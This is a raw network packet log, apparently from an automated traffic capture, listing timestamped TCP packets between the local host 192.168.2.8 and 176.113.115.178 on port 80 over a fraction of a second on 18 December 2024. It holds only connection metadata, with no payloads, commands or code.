                                                  Dec 18, 2024 14:07:40.120656013 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.120764017 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.120810032 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.121475935 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.121625900 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.121687889 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.122410059 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.122551918 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.122603893 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.123143911 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.123162031 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.123214006 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.123867035 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.123972893 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.124022961 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.124669075 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.124758005 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.124814034 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.125462055 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.125659943 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.125720024 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.126338005 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.126399040 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.126449108 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.192326069 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.192341089 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.192460060 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.192673922 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.192821026 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.192863941 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.192898989 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.193655968 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.193695068 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.193780899 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.194588900 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.194629908 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.194629908 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.195338964 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.195377111 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.195457935 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.196237087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.196274996 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.196305037 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.197032928 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.197073936 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.197141886 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.198014021 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.198052883 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.198158979 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.199075937 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.199086905 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.199115992 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.199908018 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.199949980 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.200047016 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.200829983 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.200875998 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.200917006 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.201522112 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.201538086 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.201560020 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.202107906 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.202152014 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.202163935 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.202951908 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.202995062 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.203063965 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.203854084 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.203876972 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.203896046 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.204457045 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.204498053 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.204507113 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.205317020 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.205333948 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.205358982 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.206059933 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.206104040 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.206260920 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.207117081 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.207128048 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.207161903 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.208043098 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.208085060 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.208151102 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.208704948 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.208745003 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.208774090 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.209425926 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.209465981 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.209511042 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.210119963 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.210161924 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.210268974 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.210962057 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.211033106 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.211092949 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.211885929 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.211899042 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.211926937 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.212626934 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.212667942 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.212719917 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.213524103 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.213567019 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.213639021 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.214276075 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.214315891 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.214612007 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.215097904 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.215137959 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.215372086 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.216053009 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.216093063 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.216114998 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.216798067 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.216837883 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.216918945 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.217717886 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.217760086 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.217767000 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.218442917 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.218483925 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.218632936 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.219285965 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.219327927 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.219603062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.220165968 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.220210075 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.220309019 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.221126080 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.221184969 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.221288919 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.221872091 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.221884966 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.221920967 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.222600937 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.222614050 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.222657919 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.223392963 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.223433971 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.223550081 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.224200964 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.224246025 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.224265099 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.268959045 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.308568954 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.308623075 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.308698893 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.309067965 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.309305906 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.309353113 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.309801102 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.309818983 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.309906006 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.310497999 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.310751915 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.310800076 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.311556101 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.311759949 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.311808109 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.312283039 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.312370062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.312412024 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.312954903 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.313157082 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.313198090 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.313886881 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.313900948 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.313945055 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.314733028 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.314745903 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.314780951 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.315526962 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.315630913 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.315677881 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.316287994 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.316392899 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.316479921 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.317141056 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.317190886 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.317238092 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.317936897 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.318013906 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.318058014 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.318706036 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.362684011 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.384443998 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.384462118 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.384574890 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.384792089 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.385023117 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.385056019 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.385087013 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.385917902 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.385967016 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.386104107 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.386812925 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.386857033 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.387058973 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.387491941 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.387535095 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.387564898 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.388250113 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.388293028 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.388346910 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.389080048 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.389122963 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.389151096 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.389930964 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.389964104 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.389976025 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.390948057 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.390995979 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.391069889 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.391581059 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.391623020 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.391624928 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.392409086 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.392450094 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.392518997 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.393193007 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.393237114 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.393390894 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.394004107 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.394160032 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.394191980 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.394820929 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.394870043 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.395160913 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.395704031 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.395751953 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.395836115 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.396655083 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.396667957 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.396739960 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.397557974 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.397572041 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.397603989 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.398156881 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.398199081 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.398226976 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.398963928 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.399003983 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.399141073 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.400052071 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.400098085 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.400130033 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.400690079 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.400705099 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.400732994 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.401423931 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.401465893 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.401499033 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.402285099 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.402332067 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.402352095 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.403095007 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.403136969 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.403240919 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.404052019 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.404064894 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.404120922 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.404752970 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.404797077 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.404815912 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.405647039 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.405661106 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.405689001 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.406416893 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.406456947 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.406470060 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.407327890 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.407341003 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.407371998 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.408060074 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.408114910 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.408204079 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.408842087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.408881903 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.408921957 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.409684896 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.409730911 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.409795046 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.410504103 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.410561085 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.410650969 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.411303043 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.411361933 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.411365032 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.412182093 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.412234068 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.412259102 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.413103104 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.413152933 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.413434982 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.414117098 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.414167881 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.414186954 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.414882898 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.414926052 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.414988995 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.415761948 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.415776014 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.415811062 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.416311979 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.416356087 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.416404963 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.457710981 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.500633955 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.500654936 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.500803947 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.501126051 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.501210928 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.501254082 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.501775026 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.502052069 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.502094984 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.503272057 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.503355026 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.503390074 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.503767014 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.503873110 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.503912926 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.504348993 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.504441023 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.504483938 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.505093098 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.505162954 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.505204916 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.506184101 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.506196976 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.506243944 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.506736994 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.506753922 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.506793976 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.507460117 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.507760048 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.507803917 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.508347988 CET8049707176.113.115.178192.168.2.8
